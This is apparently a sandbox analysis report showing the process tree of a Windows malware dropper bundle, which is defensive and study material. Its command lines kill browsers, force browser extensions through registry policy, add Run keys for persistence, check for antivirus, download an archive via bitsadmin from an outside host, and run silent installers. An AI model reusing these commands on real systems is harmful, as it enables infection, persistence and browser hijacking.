                                                                                                                                                                                                      61f4443c9fbcd_Fri194fb3d4f.exe
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      PID:2384
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:2172
                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:1112
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c 61f4444504679_Fri191abfd0222.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      PID:784
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f4444504679_Fri191abfd0222.exe
                                                                                                                                                                                                        61f4444504679_Fri191abfd0222.exe
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:2412
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-KLV7R.tmp\61f4444504679_Fri191abfd0222.tmp
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-KLV7R.tmp\61f4444504679_Fri191abfd0222.tmp" /SL5="$30226,140559,56832,C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f4444504679_Fri191abfd0222.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:2596
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-S6B23.tmp\MSekni.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-S6B23.tmp\MSekni.exe" /S /UID=91
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                            PID:2200
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\03-c19bf-930-27693-c1906f56ef245\Lujiwetyzha.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\03-c19bf-930-27693-c1906f56ef245\Lujiwetyzha.exe"
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:2052
                                                                                                                                                                                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                PID:2308
                                                                                                                                                                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2308 CREDAT:275457 /prefetch:2
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                    PID:1924
                                                                                                                                                                                                                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2308 CREDAT:340994 /prefetch:2
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:1600
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 1432
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:2456
                                                                                                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                      PID:1064
                                                                                                                                                                                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1064 CREDAT:275457 /prefetch:2
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:304
                                                                                                                                                                                                                      • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                        "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                          PID:8036
                                                                                                                                                                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8036 CREDAT:275457 /prefetch:2
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                              PID:1160
                                                                                                                                                                                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8036 CREDAT:5387265 /prefetch:2
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                PID:8588
                                                                                                                                                                                                                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8036 CREDAT:209944 /prefetch:2
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                  PID:8292
                                                                                                                                                                                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8036 CREDAT:275482 /prefetch:2
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                    PID:6484
                                                                                                                                                                                                                                • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                    PID:8504
                                                                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8504 CREDAT:275457 /prefetch:2
                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                        PID:8844
                                                                                                                                                                                                                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                        PID:8868
                                                                                                                                                                                                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8868 CREDAT:275457 /prefetch:2
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:8236
                                                                                                                                                                                                                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                            PID:6264
                                                                                                                                                                                                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6264 CREDAT:275457 /prefetch:2
                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                PID:7568
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\e7-0666a-45c-42382-509b9e9d4f09f\Nefilicoji.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\e7-0666a-45c-42382-509b9e9d4f09f\Nefilicoji.exe"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                            PID:2572
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ymb0wq2u.sb1\fq.exe /S /subid=948 & exit
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                PID:2760
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ymb0wq2u.sb1\fq.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\ymb0wq2u.sb1\fq.exe /S /subid=948
                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                  PID:1048
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\nswA1FB.tmp\fq.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\nswA1FB.tmp\fq.exe
                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:1692
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\nswA1FB.tmp\fq.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\nswA1FB.tmp\fq.exe" /S /subid=948
                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:1940
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Edge\ExtensionInstallForcelist /v 1 /t REG_SZ /d lbiobkhhodgbcpmhjiomcemknhgabakl;file:///C:/Windows/Installer/{244d2618-52c8-5493-e3fe-a33ecc269e36}/da36cb5f19945275dfbaf5fdb2b0f2cc.001
                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                        PID:2732
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        reg add HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\ExtensionInstallForcelist /v 1 /t REG_SZ /d lbiobkhhodgbcpmhjiomcemknhgabakl;file:///C:/Windows/Installer/{244d2618-52c8-5493-e3fe-a33ecc269e36}/da36cb5f19945275dfbaf5fdb2b0f2cc
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                        • Checks for any installed AV software in registry
                                                                                                                                                                                                                                                        PID:2864
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                        rundll32 "C:\Program Files (x86)\Footer Quotes\chrome_manager_x64.dll" main --install-run
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                          PID:1504
                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                            rundll32 "C:\Program Files (x86)\Footer Quotes\chrome_manager_x64.dll" main --install-run
                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                              PID:2192
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                            rundll32 "C:\ProgramData\aeche.dll" main -c uninstall
                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                              PID:1172
                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                rundll32 "C:\ProgramData\aeche.dll" main -c uninstall
                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                  PID:1936
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                rundll32 "C:\ProgramData\aeche.dll" main -c install-run
                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                  PID:2856
                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                    rundll32 "C:\ProgramData\aeche.dll" main -c install-run
                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                      PID:2028
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                    rundll32 "C:\Program Files (x86)\Footer Quotes\chrome_manager_x64.dll" main -c cdo "Footer Quotes"
                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                      PID:2576
                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                        rundll32 "C:\Program Files (x86)\Footer Quotes\chrome_manager_x64.dll" main -c cdo "Footer Quotes"
                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                          PID:2012
                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h0f5jomb.dm3\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                    PID:2784
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\h0f5jomb.dm3\GcleanerEU.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\h0f5jomb.dm3\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                      PID:2428
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\h0f5jomb.dm3\GcleanerEU.exe" & exit
                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                          PID:2256
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                            taskkill /im "GcleanerEU.exe" /f
                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                            PID:2328
                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\el2s44mp.gkx\161.exe /silent /subid=798 & exit
                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                        PID:980
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\el2s44mp.gkx\161.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\el2s44mp.gkx\161.exe /silent /subid=798
                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                          PID:1320
                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xyoxhl5g.3hf\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                          PID:2880
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\xyoxhl5g.3hf\installer.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\xyoxhl5g.3hf\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                            PID:2248
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\xyoxhl5g.3hf\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\xyoxhl5g.3hf\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1643138047 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                PID:1196
                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i1nssvhu.r1u\random.exe & exit
                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                              PID:696
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\i1nssvhu.r1u\random.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\i1nssvhu.r1u\random.exe
                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                PID:3008
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\i1nssvhu.r1u\random.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\i1nssvhu.r1u\random.exe" -a
                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  PID:1452
                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xmmcj2ii.5in\HcxNpMX.exe & exit
                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                PID:2716
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\xmmcj2ii.5in\HcxNpMX.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\xmmcj2ii.5in\HcxNpMX.exe
                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                  PID:2132
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                    rundll32
                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                      PID:2272
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      cmd /c cmd < Giu.gif
                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                        PID:2040
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          cmd
                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                            PID:1312
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                                                                              find /I /N "bullguardcore.exe"
                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                PID:2592
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                tasklist /FI "imagename eq BullGuardCore.exe"
                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                PID:2356
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3ltjzy00.4tp\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                          PID:1316
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3ltjzy00.4tp\autosubplayer.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\3ltjzy00.4tp\autosubplayer.exe /S
                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                            PID:2172
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmEA42.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                              PID:2772
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmEA42.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                PID:1936
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmEA42.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                  PID:2344
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmEA42.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                    PID:2916
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmEA42.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                      PID:2232
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmEA42.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                        PID:2904
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmEA42.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                          PID:2864
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                          "bitsadmin" /Transfer helper http://polehosting.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                          • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                          PID:608
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v1p44c30.al2\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                        PID:2688
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\v1p44c30.al2\gcleaner.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\v1p44c30.al2\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                            PID:2988
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\v1p44c30.al2\gcleaner.exe" & exit
                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                PID:2508
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                  taskkill /im "gcleaner.exe" /f
                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                  PID:2116
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uyibq1ky.hs4\askinstall42.exe & exit
                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                              PID:2668
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\uyibq1ky.hs4\askinstall42.exe
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\uyibq1ky.hs4\askinstall42.exe
                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                                                PID:996
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                    PID:832
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                      PID:2160
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pjyw4h2v.z5i\RobCleanerInstlr252215.exe & exit
                                                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                                                  PID:2212
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\pjyw4h2v.z5i\RobCleanerInstlr252215.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\pjyw4h2v.z5i\RobCleanerInstlr252215.exe
                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                                                    PID:1920
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\54s0kxgv.hk2\siww1053.exe & exit
                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                    PID:2412
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\54s0kxgv.hk2\siww1053.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\54s0kxgv.hk2\siww1053.exe
                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      PID:2672
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        PID:784
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
